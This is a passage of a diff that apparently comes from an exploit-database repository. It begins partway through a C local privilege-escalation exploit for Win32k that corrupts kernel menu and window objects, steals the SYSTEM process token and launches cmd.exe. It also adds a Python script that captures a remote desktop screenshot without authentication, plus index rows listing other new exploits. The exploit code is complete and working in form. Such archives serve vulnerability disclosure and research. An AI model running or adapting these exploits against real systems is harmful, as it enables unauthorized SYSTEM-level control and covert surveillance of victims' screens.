field_88; + ULONG64 field_90; + PVOID ref; // + 0x98 +}; +struct MyData +{ + BYTE name[0x96]; +}; +tagMENU* g_pFakeMenu = 0; +static PSHELLCODE pvShellCode = NULL; +HMENU hSystemMenu; +HMENU hMenu; +HMENU hSubMenu; +HMENU hAddedSubMenu; +HMENU hMenuB; +PVOID MENU_add = 0; +DWORD flag = 0; +UINT iWindowCount = 0x100; +HWND HWND_list[0x300]; +HWND HWND_list1[0x20]; +HMENU HMENUL_list[0x300]; +int Hwnd_num = 0; +int Hwnd_num1 = 0; +ULONGLONG HWND_add = 0; +ULONGLONG GS_off = 0; +WORD max = 0; + +static PULONGLONG ptagWNDFake = NULL; +static PULONGLONG ptagWNDFake1 = NULL; +static PULONGLONG ptagWNDFake2 = NULL; + +static PULONGLONG GS_hanlde = NULL; + +static PULONGLONG HWND_class = NULL; + + +struct ThreadParams { + int threadId; + int numLoops; +}; + + +static unsigned long long GetGsValue(unsigned long long gsValue) +{ + return gsValue; +} +PVOID +GetMenuHandle(HMENU menu_D) +{ + int conut = 0; + PVOID HANDLE = 0; + PBYTE add = 0; + WORD temp = 0; + DWORD offset = 0xbd688; + HMODULE hModule = LoadLibraryA("USER32.DLL"); + + PBYTE pfnIsMenu = (PBYTE)GetProcAddress(hModule, "IsMenu"); + ULONGLONG par1 = 0; + DWORD par2 = 0; + memcpy((VOID*)&par1, (char*)((ULONGLONG)hModule + offset), 0x08); + memcpy((VOID*)&par2, (char*)((ULONGLONG)hModule + offset + 0x08), 0x02); + + add = (PBYTE)(par1 + 0x18 * (WORD)menu_D); + + if (add) + { + HANDLE = *(PVOID*)add; + } + else + { + HANDLE = 0; + } + HANDLE= (PVOID*)((ULONGLONG)HANDLE - GS_off+0x20); + return *(PVOID*)HANDLE; + +} + +PVOID +xxGetHMValidateHandle(HMENU menu_D, DWORD type_hanlde) +{ + int conut = 0; + PVOID HANDLE = 0; + PBYTE add = 0; + WORD temp = 0; + DWORD offset = 0xbd688; + HMODULE hModule = LoadLibraryA("USER32.DLL"); + + PBYTE pfnIsMenu = (PBYTE)GetProcAddress(hModule, "IsMenu"); + ULONGLONG par1 = 0; + DWORD par2 = 0; + memcpy((VOID*)&par1, (char*)((ULONGLONG)hModule + offset), 0x08); + memcpy((VOID*)&par2, (char*)((ULONGLONG)hModule + offset + 0x08), 0x02); + + temp = (ULONGLONG)menu_D >> 16; + add = (PBYTE)(par1 + 0x18 * (WORD)menu_D); + if (add) + { + HANDLE = *(PVOID*)add; + } + else + { + HANDLE = 0; + } + HANDLE = (PVOID*)((ULONGLONG)HANDLE - GS_off + 0x20); + return *(PVOID*)HANDLE; + +} + + +static +VOID +xxReallocPopupMenu(VOID) +{ + for (INT i = 0; i < 0x8; i++) + { + WNDCLASSEXW Class = { 0 }; + WCHAR szTemp[0x100] = { 0 }; + HWND hwnd = NULL; + wsprintfW(szTemp, +L"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@A%d", +i); + Class.cbSize = sizeof(WNDCLASSEXA); + Class.lpfnWndProc = DefWindowProcW; + Class.cbWndExtra = 0; + Class.hInstance = GetModuleHandleA(NULL); + Class.lpszMenuName = NULL; + Class.lpszClassName = szTemp; + if (!RegisterClassExW(&Class)) + { + continue; + } + } + +} +VOID +createclass(VOID) +{ + WCHAR szTemp[0x100] = { 0 }; + for (INT i = 9; i < 29; i++) + { + WNDCLASSEXW Class = { 0 }; + + HWND hwnd = NULL; + wsprintfW(szTemp, L"A@A%d", i); + Class.cbSize = sizeof(WNDCLASSEXA); + Class.lpfnWndProc = DefWindowProcW; + Class.cbWndExtra = 0x20; + Class.hInstance = GetModuleHandleA(NULL); + Class.lpszMenuName = NULL; + Class.lpszClassName = szTemp; + Class.cbClsExtra = 0x1a0; + if (!RegisterClassExW(&Class)) + { + continue; + } + } + + for (INT i = 9; i < 29; i++) + { + wsprintfW(szTemp, L"A@A%d", i); + HWND_list1[i]=CreateWindowEx(NULL, szTemp, NULL, WS_VISIBLE, 0, 0, +0, 0, NULL,NULL, NULL, NULL); + + + } + +} + +ULONG64 Read64(ULONG64 address) +{ + MENUBARINFO mbi = { 0 }; + mbi.cbSize = sizeof(MENUBARINFO); + + g_pFakeMenu->rgItems = PVOID(address - 0x48); + GetMenuBarInfo(HWND_list[max+1], OBJID_MENU, 1, &mbi); + + return (unsigned int)mbi.rcBar.left + ((ULONGLONG)mbi.rcBar.top << 32); +} +void exploit() +{ + for (int i = 0; i < 0x20; i++) + { + + ULONG64 pmenu = SetClassLongPtr(HWND_list1[i], 0x270, +(LONG_PTR)g_pFakeMenu); + if (pmenu != 0) + { + Hwnd_num = i; + MENUBARINFO mbi = { 0 }; + mbi.cbSize = sizeof(MENUBARINFO); + + + + } + } + + + // Token stealing + ULONG64 p = Read64(HWND_add +0x250+ 0x10); // USER_THREADINFO + p = Read64(p); //THREADINFO + p = Read64(p + 0x220); // (PROCESSINFO) + + ULONG64 eprocess = p; + printf("Current EPROCESS = %llx\n", eprocess); + p = Read64(p + 0x2f0); + + do { + + p = Read64(p + 0x08); + ULONG64 pid = Read64(p - 0x08); + if (pid == 4) { + + ULONG64 pSystemToken = Read64(p + 0x68); + printf("pSys/tem Token = %llx \n", pSystemToken); + + HWND_class = (PULONGLONG)((PBYTE)0x303000); + HWND_class[8] = eprocess + 0x290; + HWND_class[12] = 0x100; + HWND_class[20] = 0x303010; + + ULONG64 ret_add = SetClassLongPtr(HWND_list1[Hwnd_num], 0x250 + +0x98 - 0xa0, (LONG_PTR)HWND_class); + SetClassLongPtr(HWND_list[max + 1], 0x28, pSystemToken); + ret_add = SetClassLongPtr(HWND_list1[Hwnd_num], 0x250 + 0x98 - +0xa0, (LONG_PTR)ret_add); + + break; + } + } while (p != eprocess); + syytem(); +} + + +void buildmem() +{ + + WORD max_handle = 0; + pvShellCode = (PSHELLCODE)VirtualAlloc((PVOID)0x300000, 0x10000, +MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); + if (pvShellCode == NULL) + { + return; + } + ZeroMemory(pvShellCode, 0x10000); + + + + ptagWNDFake = (PULONGLONG)((PBYTE)0x304140); + ptagWNDFake[0] = (ULONGLONG)0x304140; + + ptagWNDFake[2] = (ULONGLONG)0x304140 + 0x10; + + + + ptagWNDFake[6] = (ULONGLONG)0x304140; + ptagWNDFake[8] = 0x305300; + + ptagWNDFake[11] = (ULONGLONG)MENU_add; + ptagWNDFake[68] = (ULONGLONG)0x304140 + 0x230; + ptagWNDFake[69] = (ULONGLONG)0x304140 + 0x28; + ptagWNDFake[70] = (ULONGLONG)0x304140 + 0x30; + ptagWNDFake[71] = (ULONGLONG)0x000004; + + + ptagWNDFake1 = (PULONGLONG)((PBYTE)0x305300); + ptagWNDFake1[1] = (ULONGLONG)0x11; + ptagWNDFake1[2] = (ULONGLONG)0x305320; + ptagWNDFake1[6] = (ULONGLONG)0x1000000000020000; + ptagWNDFake1[8] = (ULONGLONG)0x00000000029d0000; + ptagWNDFake1[11] = (ULONGLONG)HWND_add + 0x63 - 0x120; + + + ptagWNDFake1[14] = (ULONGLONG)0x306500; + ptagWNDFake1[16] = (ULONGLONG)305400; + + + ptagWNDFake2 = (PULONGLONG)((PBYTE)0x306500); + ptagWNDFake1[11] = (ULONGLONG)0x306600; + + + + WNDCLASSEX WndClass = { 0 }; + WndClass.cbSize = sizeof(WNDCLASSEX); + WndClass.lpfnWndProc = DefWindowProc; + WndClass.style = CS_VREDRAW | CS_HREDRAW; + WndClass.cbWndExtra = 0xe0; + WndClass.hInstance = NULL; + WndClass.lpszMenuName = NULL; + WndClass.lpszClassName = L"NormalClass"; + + RegisterClassEx(&WndClass); + + for (int i = 0; i < 0x200; i++) + { + HMENUL_list[i] = CreateMenu(); + } + for (int i = 0; i < 0x100; i++) + { + HWND_list[i] = CreateWindowEx(NULL, L"NormalClass", NULL, +WS_VISIBLE, 0, 0, 0, 0, NULL, HMENUL_list[i], NULL, NULL); + + } + for (int i = 0; i < 0x100; i++) + { + + + SetWindowLongPtr(HWND_list[i], 0x58, (LONG_PTR)0x0002080000000000); + + SetWindowLongPtr(HWND_list[i], 0x80, (LONG_PTR)0x0000303030000000); + + } + + + for (int i = 0x20; i < 0x60; i++) + { + if ((ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i * 2], +0x01)- (ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i * 2 - 1], +0x01)== 0x250) + { + if ((ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i * 2 + +1], 0x01)-(ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i * 2], 0x01) +== 0x250) + { + HWND_add = +(ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i*2], 0x01); + max = i * 2; + break; + } + } + if (i == 0x5f) + { + HWND_add = 0; + } + + } + + ptagWNDFake1[11] = (ULONGLONG)HWND_add + 0x63 - 0x120; + + + DestroyWindow(HWND_list[max]); + + createclass(); + + + + // Create a fake spmenu + PVOID hHeap = (PVOID)0x302000; + + g_pFakeMenu = (tagMENU*)(PVOID)0x302000; + g_pFakeMenu->ref = (PVOID)0x302300; + *(PULONG64)g_pFakeMenu->ref = (ULONG64)g_pFakeMenu; + // cItems = 1 + g_pFakeMenu->obj28 = (PVOID)0x302200; + *(PULONG64)((PBYTE)g_pFakeMenu->obj28 + 0x2C) = 1; + // rgItems + g_pFakeMenu->rgItems = (PVOID)0x304000; + // cx / cy must > 0 + g_pFakeMenu->flag1 = 1; + g_pFakeMenu->flag2 = 1; + g_pFakeMenu->cxMenu = 1; + g_pFakeMenu->cyMenu = 1; + + + // + +} +int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR +lpCmdLine, int nCmdShow) +{ + ULONGLONG gsValue = 0; + unsigned char shellcode[] = +"\x65\x48\x8B\x04\x25\x30\x00\x00\x00\x90\x90\x90\x90\x90\x90\x90\x90\x90\xc3"; + + LPVOID executableMemory = VirtualAlloc(NULL, sizeof(shellcode), +MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); + if (executableMemory == NULL) { + return 1; + } + memcpy(executableMemory, shellcode, sizeof(shellcode)); + + gsValue = ((ULONGLONG(*)())executableMemory)(); + gsValue = gsValue + 0x800; + GS_hanlde = (PULONGLONG)(PBYTE)gsValue; + GS_off = GS_hanlde[5]; + + char str[0xb8] = ""; + memset(str, 0x41, 0xa8); + g_NtUserEnableMenuItem = +(NtUserEnableMenuItem)GetProcAddress(GetModuleHandleA("win32u.dll"), +"NtUserEnableMenuItem"); + g_NtUserSetClassLongPtr = +(NtUserSetClassLongPtr)GetProcAddress(GetModuleHandleA("win32u.dll"), +"NtUserSetClassLongPtr"); + g_NtUserCreateAcceleratorTable = +(NtUserCreateAcceleratorTable)GetProcAddress(GetModuleHandleA("win32u.dll"), +"NtUserCreateAcceleratorTable"); + g_pfnNtUserConsoleControl = +(fnNtUserConsoleControl)GetProcAddress(GetModuleHandleA("win32u.dll"), +"NtUserConsoleControl"); + + WNDCLASS wc = { 0 }; + + wc.lpfnWndProc = WndProc; + wc.hInstance = hInstance; + wc.lpszClassName = TEXT("EnableMenuItem"); + + RegisterClass(&wc); + + HWND hWnd = CreateWindow( + wc.lpszClassName, + TEXT("EnableMenuItem"), + WS_OVERLAPPEDWINDOW, + CW_USEDEFAULT, + CW_USEDEFAULT, + 400, 300, + NULL, + NULL, + hInstance, + NULL + ); + + if (!hWnd) return FALSE; + + /// + + + hSystemMenu = GetSystemMenu(hWnd, FALSE); + + hSubMenu = CreatePopupMenu(); + MENU_add = GetMenuHandle(hSubMenu); + hMenuB = CreateMenu(); + + buildmem(); + if (HWND_add == 0) + { + return 0; + } + + + AppendMenu(hSubMenu, MF_STRING, 0x2061, TEXT("0")); + AppendMenu(hSubMenu, MF_STRING, 0xf060, TEXT("1")); + + DeleteMenu(hSystemMenu, SC_CLOSE, MF_BYCOMMAND); + + AppendMenu(hMenuB, MF_POPUP, (UINT_PTR)hSubMenu, L"Menu A"); + + AppendMenu(hSystemMenu, MF_POPUP, (UINT_PTR)hMenuB, L"Menu B"); + + + + ShowWindow(hWnd, nCmdShow); + UpdateWindow(hWnd); + + flag = 1; + g_NtUserEnableMenuItem(hSystemMenu, 0xf060, 0x01); + + exploit(); + + MSG msg = { 0 }; + + while (GetMessage(&msg, NULL, 0, 0)) + { + TranslateMessage(&msg); + DispatchMessage(&msg); + } + + return (int)msg.wParam; +} + +LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM +lParam) +{ + switch (message) + { + case WM_DESTROY: + PostQuitMessage(0); + return 0; + case 0xae: + switch (wParam) + { + case 0x1000: + if (flag) + { + int itemCount = GetMenuItemCount(hMenuB); + + for (int i = itemCount - 1; i >= 0; i--) { + RemoveMenu(hMenuB, i, MF_BYPOSITION); + } + DestroyMenu(hSubMenu); + xxReallocPopupMenu(); + } + case 0x1001: + if (flag) + { + int itemCount = GetMenuItemCount(hMenuB); + + for (int i = itemCount - 1; i >= 0; i--) { + RemoveMenu(hMenuB, i, MF_BYPOSITION); + } + DestroyMenu(hSubMenu); + xxReallocPopupMenu(); + } + + return 0; + } + break; + + + } + + return DefWindowProc(hWnd, message, wParam, lParam); +} +int syytem() +{ + SECURITY_ATTRIBUTES sa; + HANDLE hRead, hWrite; + byte buf[40960] = { 0 }; + STARTUPINFOW si; + PROCESS_INFORMATION pi; + DWORD bytesRead; + RtlSecureZeroMemory(&si, sizeof(si)); + RtlSecureZeroMemory(&pi, sizeof(pi)); + RtlSecureZeroMemory(&sa, sizeof(sa)); + int br = 0; + sa.nLength = sizeof(SECURITY_ATTRIBUTES); + sa.lpSecurityDescriptor = NULL; + sa.bInheritHandle = TRUE; + if (!CreatePipe(&hRead, &hWrite, &sa, 0)) + { + return -3; + } + + si.cb = sizeof(STARTUPINFO); + GetStartupInfoW(&si); + si.hStdError = hWrite; + si.hStdOutput = hWrite; + si.wShowWindow = SW_HIDE; + si.lpDesktop = L"WinSta0\\Default"; + si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES; + wchar_t cmd[4096] = { L"cmd.exe" }; + + if (!CreateProcessW(NULL, cmd, NULL, NULL, TRUE, 0, NULL, NULL, &si, +&pi)) + { + CloseHandle(hWrite); + CloseHandle(hRead); + printf("[!] CreateProcessW Failed![%lx]\n", GetLastError()); + return -2; + } + CloseHandle(hWrite); + +} \ No newline at end of file diff --git a/exploits/windows/remote/52300.py b/exploits/windows/remote/52300.py new file mode 100755 index 000000000..82f027873 --- /dev/null +++ b/exploits/windows/remote/52300.py @@ -0,0 +1,61 @@ +# Exploit Title: Windows 2024.15 - Unauthenticated Desktop Screenshot Capture +# Date: 2025-05-19 +# Exploit Author: Chokri Hammedi +# Vendor Homepage: https://rs.ltd +# Software Link: https://rs.ltd/latest.php?os=win +# Version: 2024.15 +# Tested on: Windows 10/11 with Remote for Windows (helper) + +''' +Description: +- Exploits the getScreenshot API endpoint in Remote for Windows helper +service +- Works when "Allow unknown devices" setting is enabled (default: disabled) +- Captures current desktop including login screens (SYSTEM-level access) + +Vulnerable Component: +- /api/getScreenshot endpoint with missing authentication checks + + +# Identification: +nmap -p- -T4 --script ssl-cert +Look for SSL cert with subject: CN=SecureHTTPServer/O=Evgeny Cherpak/C=US +''' + +#!/usr/bin/env python3 + +import requests +import sys +from urllib3.exceptions import InsecureRequestWarning +requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) + +def capture_screenshot(ip, port, output_file): + try: + response = requests.get( + f"https://{ip}:{port}/api/getScreenshot", + headers={ + "X-ClientToken": "exploit", + "X-HostName": "attacker-pc", + "X-HostFullModel": "exploit-device" + }, + verify=False, + timeout=15 + ) + if response.status_code == 200 and +response.content.startswith(b'\xff\xd8'): + with open(output_file, 'wb') as f: + f.write(response.content) + print(f"[+] Saved: {output_file}") + return True + print(f"[-] Failed: HTTP {response.status_code}") + return False + except Exception as e: + print(f"[-] Error: {str(e)}") + return False + +if __name__ == "__main__": + if len(sys.argv) < 4: + print(f"Usage: {sys.argv[0]} ") + sys.exit(1) + sys.exit(0 if capture_screenshot(sys.argv[1], sys.argv[2], sys.argv[3]) +else 1) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 937480489..29175d14f 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -5550,6 +5550,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 33254,exploits/java/webapps/33254.txt,"IBM Lotus Connections 2.0.1 - 'simpleSearch.do' Cross-Site Scripting",2009-09-23,IBM,webapps,java,,2009-09-23,2014-05-09,1,CVE-2009-3469;OSVDB-58320,,,,,https://www.securityfocus.com/bid/36513/info 31438,exploits/java/webapps/31438.txt,"IBM Rational ClearQuest 7.0 - Multiple Cross-Site Scripting Vulnerabilities",2008-03-19,sasquatch,webapps,java,,2008-03-19,2014-02-06,1,CVE-2007-4592;OSVDB-43356,,,,,https://www.securityfocus.com/bid/28296/info 36299,exploits/java/webapps/36299.txt,"Infoblox NetMRI 6.2.1 - Admin Login Page Multiple Cross-Site Scripting Vulnerabilities",2011-11-11,"Jose Carlos de Arriba",webapps,java,,2011-11-11,2015-03-06,1,,,,,,https://www.securityfocus.com/bid/50646/info +52304,exploits/java/webapps/52304.py,"Java-springboot-codebase 1.1 - Arbitrary File Read",2025-05-25,d3sca,webapps,java,,2025-05-25,2025-05-25,0,CVE-2025-46822,,,,, 36971,exploits/java/webapps/36971.txt,"JavaBB 0.99 - 'userId' Cross-Site Scripting",2012-03-18,sonyy,webapps,java,,2012-03-18,2015-05-09,1,,,,,,https://www.securityfocus.com/bid/52545/info 36828,exploits/java/webapps/36828.txt,"JaWiki - 'versionNo' Cross-Site Scripting",2012-02-17,sonyy,webapps,java,,2012-02-17,2015-04-27,1,,,,,,https://www.securityfocus.com/bid/52060/info 37033,exploits/java/webapps/37033.txt,"JBMC Software DirectAdmin 1.403 - 'domain' Cross-Site Scripting",2012-04-02,"Dawid Golak",webapps,java,,2012-04-02,2015-05-17,1,,,,,,https://www.securityfocus.com/bid/52845/info @@ -10425,6 +10426,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 52191,exploits/multiple/hardware/52191.py,"ZTE ZXHN H168N 3.1 - Remote Code Execution (RCE) via authentication bypass",2025-04-14,"tasos meletlidis",hardware,multiple,,2025-04-14,2025-04-14,0,,,,,, 11651,exploits/multiple/local/11651.sh,"(Tod Miller's) Sudo/SudoEdit 1.6.9p21/1.7.2p4 - Local Privilege Escalation",2010-03-07,kingcope,local,multiple,,2010-03-06,,1,,,,,, 51849,exploits/multiple/local/51849.py,"A-PDF All to MP3 Converter 2.0.0 - DEP Bypass via HeapCreate + HeapAlloc",2024-03-03,"George Washington",local,multiple,,2024-03-03,2024-03-03,0,,,,,, +52306,exploits/multiple/local/52306.txt,"ABB Cylon Aspect Studio 3.08.03 - Binary Planting",2025-05-25,LiquidWorm,local,multiple,,2025-05-25,2025-05-25,0,CVE-2024-13946,,,,, 38835,exploits/multiple/local/38835.py,"abrt (Centos 7.1 / Fedora 22) - Local Privilege Escalation",2015-12-01,rebel,local,multiple,,2015-12-01,2018-11-17,1,CVE-2015-5287;CVE-2015-5273;OSVDB-130747;OSVDB-130746;OSVDB-130745;OSVDB-130609,,,http://www.exploit-db.com/screenshots/idlt39000/screen-shot-2015-12-03-at-40702-pm.png,, 30666,exploits/multiple/local/30666.txt,"ACE Stream Media 2.1 - 'acestream://' Format String",2014-01-03,LiquidWorm,local,multiple,,2014-01-07,2014-01-07,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5165.php 19139,exploits/multiple/local/19139.py,"Adobe Illustrator CS5.5 - Memory Corruption",2012-06-14,"Felipe Andres Manzano",local,multiple,,2012-06-14,2012-06-14,0,OSVDB-81754;CVE-2012-0780,,,,, @@ -10619,6 +10621,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 22327,exploits/multiple/remote/22327.txt,"3Com SuperStack 3 Firewall - Content Filter Bypassing",2003-03-05,bit_logic,remote,multiple,,2003-03-05,2012-10-28,1,,,,,,https://www.securityfocus.com/bid/7021/info 31921,exploits/multiple/remote/31921.txt,"3D-FTP 8.01 - 'LIST' / 'MLSD' Directory Traversal",2008-06-16,"Tan Chew Keong",remote,multiple,,2008-06-16,2014-02-26,1,CVE-2008-2822;OSVDB-46155,,,,,https://www.securityfocus.com/bid/29749/info 32167,exploits/multiple/remote/32167.txt,"8E6 Technologies R3000 - Host Header Internet Filter Security Bypass",2008-08-05,nnposter,remote,multiple,,2008-08-05,2014-03-11,1,CVE-2008-3494;OSVDB-47517,,,,,https://www.securityfocus.com/bid/30541/info +52305,exploits/multiple/remote/52305.py,"ABB Cylon Aspect 3.08.03 - Guest2Root Privilege Escalation",2025-05-25,LiquidWorm,remote,multiple,,2025-05-25,2025-05-25,0,CVE-n/a,,,,, 25019,exploits/multiple/remote/25019.txt,"ABC2MIDI 2004-12-04 - Multiple Stack Buffer Overflow Vulnerabilities",2004-12-15,"Limin Wang",remote,multiple,,2004-12-15,2013-04-30,1,CVE-2004-1256;OSVDB-12426,,,,,https://www.securityfocus.com/bid/12019/info 25018,exploits/multiple/remote/25018.txt,"ABC2MTEX 1.6.1 - Process ABC Key Field Buffer Overflow",2004-12-15,"Limin Wang",remote,multiple,,2004-12-15,2013-04-30,1,,,,,,https://www.securityfocus.com/bid/12018/info 32382,exploits/multiple/remote/32382.txt,"Accellion File Transfer Appliance Error Report Message - Open Email Relay",2008-09-15,"Eric Beaulieu",remote,multiple,,2008-09-15,2014-03-20,1,CVE-2008-7012;OSVDB-48242,,,,,https://www.securityfocus.com/bid/31178/info @@ -10994,6 +10997,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 19903,exploits/multiple/remote/19903.txt,"Gossamer Threads DBMan 2.0.4 - DBMan Information Leakage",2000-05-05,"Black Watch Labs",remote,multiple,,2000-05-05,2012-07-17,1,CVE-2000-0381;OSVDB-306,,,,,https://www.securityfocus.com/bid/1178/info 39292,exploits/multiple/remote/39292.pl,"Granding MA300 - Traffic Sniffing Man In The Middle Fingerprint PIN Disclosure",2014-08-26,"Eric Sesterhenn",remote,multiple,,2014-08-26,2018-01-11,1,CVE-2014-5380;OSVDB-110460,,,,,https://www.securityfocus.com/bid/69390/info 39293,exploits/multiple/remote/39293.pl,"Granding MA300 - Weak Pin Encryption Brute Force",2014-08-26,"Eric Sesterhenn",remote,multiple,,2014-08-26,2016-01-22,1,CVE-2014-5381;OSVDB-110456,,,,,https://www.securityfocus.com/bid/69390/info +52303,exploits/multiple/remote/52303.py,"Grandstream GSD3710 1.0.11.13 - Stack Buffer Overflow",2025-05-25,Pepelux,remote,multiple,,2025-05-25,2025-05-25,0,CVE-2022-2070,,,,, 33203,exploits/multiple/remote/33203.txt,"GreenSQL Firewall 0.9.x - WHERE Clause Security Bypass",2009-09-02,"Johannes Dahse",remote,multiple,,2009-09-02,2014-05-06,1,CVE-2008-6992;OSVDB-48910,,,,,https://www.securityfocus.com/bid/36209/info 38049,exploits/multiple/remote/38049.txt,"Greenstone - Multiple Vulnerabilities",2012-11-23,AkaStep,remote,multiple,,2012-11-23,2016-12-18,1,,,,,,https://www.securityfocus.com/bid/56662/info 31912,exploits/multiple/remote/31912.txt,"GSC Client 1.00 2067 - Privilege Escalation",2008-06-14,"Michael Gray",remote,multiple,,2014-04-09,2014-04-09,0,CVE-2008-7170;OSVDB-53482,,,,,https://www.securityfocus.com/bid/29718/info @@ -12508,6 +12512,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 49252,exploits/multiple/webapps/49252.txt,"WordPress Plugin Total Upkeep 1.14.9 - Database and Files Backup Download",2020-12-14,Wadeek,webapps,multiple,,2020-12-14,2020-12-14,0,,,,,, 33937,exploits/multiple/webapps/33937.txt,"WordPress Plugin TYPO3 't3m_cumulus_tagcloud' Extension 1.0 - HTML Injection / Cross-Site Scripting",2010-05-05,MustLive,webapps,multiple,,2010-05-05,2016-09-26,1,,,,,,https://www.securityfocus.com/bid/39926/info 52137,exploits/multiple/webapps/52137.txt,"WordPress User Registration & Membership Plugin 4.1.1 - Unauthenticated Privilege Escalation",2025-04-08,"Al Baradi Joy",webapps,multiple,,2025-04-08,2025-04-08,0,,,,,, +52302,exploits/multiple/webapps/52302.py,"WordPress User Registration & Membership Plugin 4.1.2 - Authentication Bypass",2025-05-25,"Mohammed Idrees Banyamer",webapps,multiple,,2025-05-25,2025-05-25,0,CVE-2025-2594,,,,, 37573,exploits/multiple/webapps/37573.txt,"Worksforweb iAuto - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-08-06,"Benjamin Kunz Mejri",webapps,multiple,,2012-08-06,2015-07-11,1,,,,,,https://www.securityfocus.com/bid/54812/info 40134,exploits/multiple/webapps/40134.html,"Wowza Streaming Engine 4.5.0 - Cross-Site Request Forgery (Add Advanced Admin)",2016-07-20,LiquidWorm,webapps,multiple,8088,2016-07-20,2016-07-20,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5341.php 40135,exploits/multiple/webapps/40135.txt,"Wowza Streaming Engine 4.5.0 - Multiple Cross-Site Scripting Vulnerabilities",2016-07-20,LiquidWorm,webapps,multiple,8088,2016-07-20,2016-07-20,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5343.php @@ -41375,6 +41380,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 6705,exploits/windows/local/6705.txt,"Microsoft Windows Server 2003 - Token Kidnapping Local Privilege Escalation",2008-10-08,"Cesar Cerrudo",local,windows,,2008-10-07,2018-12-18,1,,,2008-Churrasco.zip,,, 35936,exploits/windows/local/35936.py,"Microsoft Windows Server 2003 SP2 - Local Privilege Escalation (MS14-070)",2015-01-29,KoreLogic,local,windows,,2015-01-29,2015-01-29,0,CVE-2014-4076;OSVDB-114532;MS14-070,,,,, 37755,exploits/windows/local/37755.c,"Microsoft Windows Server 2003 SP2 - TCP/IP IOCTL Privilege Escalation (MS14-070)",2015-08-12,"Tomislav Paskalev",local,windows,,2015-08-15,2016-10-27,0,CVE-2014-4076;OSVDB-114532;MS14-070,,,http://www.exploit-db.com/screenshots/idlt38000/ms14-070.jpg,, +52301,exploits/windows/local/52301.c,"Microsoft Windows Server 2016 - Win32k Elevation of Privilege",2025-05-25,"Milad karimi",local,windows,,2025-05-25,2025-05-25,0,CVE-2023-29336,,,,, 43962,exploits/windows/local/43962.c,"Microsoft Windows Subsystem for Linux - 'execve()' Local Privilege Escalation",2018-02-02,"Saar Amar",local,windows,,2018-02-02,2018-02-02,1,CVE-2018-0743,Local,,,,https://raw.githubusercontent.com/saaramar/execve_exploit/master/exploit.c 353,exploits/windows/local/353.c,"Microsoft Windows Task Scheduler (XP/2000) - '.job' (MS04-022)",2004-07-18,anonymous,local,windows,,2004-07-17,2019-03-28,1,OSVDB-7798;CVE-2004-0212;MS04-022,,,,, 38200,exploits/windows/local/38200.txt,"Microsoft Windows Task Scheduler - 'DeleteExpiredTaskAfter' File Deletion Privilege Escalation",2015-09-15,"Google Security Research",local,windows,,2015-09-15,2015-09-15,1,CVE-2015-2525;OSVDB-127204,,,,,https://code.google.com/p/google-security-research/issues/detail?id=442 @@ -45934,6 +45940,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 41073,exploits/windows/remote/41073.py,"WinaXe Plus 8.7 - Remote Buffer Overflow",2017-01-16,"Peter Baris",remote,windows,,2017-01-16,2017-01-16,1,,,,http://www.exploit-db.com/screenshots/idlt41500/screen-shot-2017-01-16-at-152056.png,http://www.exploit-db.comwinaxep.exe, 16335,exploits/windows/remote/16335.rb,"WinComLPD 3.0.2 - Remote Buffer Overflow (Metasploit)",2010-06-22,Metasploit,remote,windows,,2010-06-22,2011-03-06,1,CVE-2008-5159;OSVDB-42861,"Metasploit Framework (MSF)",,,, 51575,exploits/windows/remote/51575.txt,"Windows 10 v21H1 - HTTP Protocol Stack Remote Code Execution",2023-07-07,nu11secur1ty,remote,windows,,2023-07-07,2023-07-07,0,CVE-2022-21907,,,,, +52300,exploits/windows/remote/52300.py,"Windows 2024.15 - Unauthenticated Desktop Screenshot Capture",2025-05-25,"Chokri Hammedi",remote,windows,,2025-05-25,2025-05-25,0,CVE-n/a,,,,, 30169,exploits/windows/remote/30169.txt,"WindowsPT 1.2 - User ID Key Spoofing",2007-06-11,nnposter,remote,windows,,2007-06-11,2013-12-10,1,CVE-2007-3201;OSVDB-41727,,,,,https://www.securityfocus.com/bid/24412/info 16529,exploits/windows/remote/16529.rb,"WinDVD7 - 'IASystemInfo.dll' ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows,,2010-05-09,2011-03-10,1,CVE-2007-0348;OSVDB-34315,"Metasploit Framework (MSF)",,,, 7875,exploits/windows/remote/7875.pl,"WinFTP Server 2.3.0 - 'LIST' (Authenticated) Remote Buffer Overflow",2009-01-26,"joe walko",remote,windows,21,2009-01-25,2016-09-27,1,OSVDB-51667;CVE-2009-0351,,,,,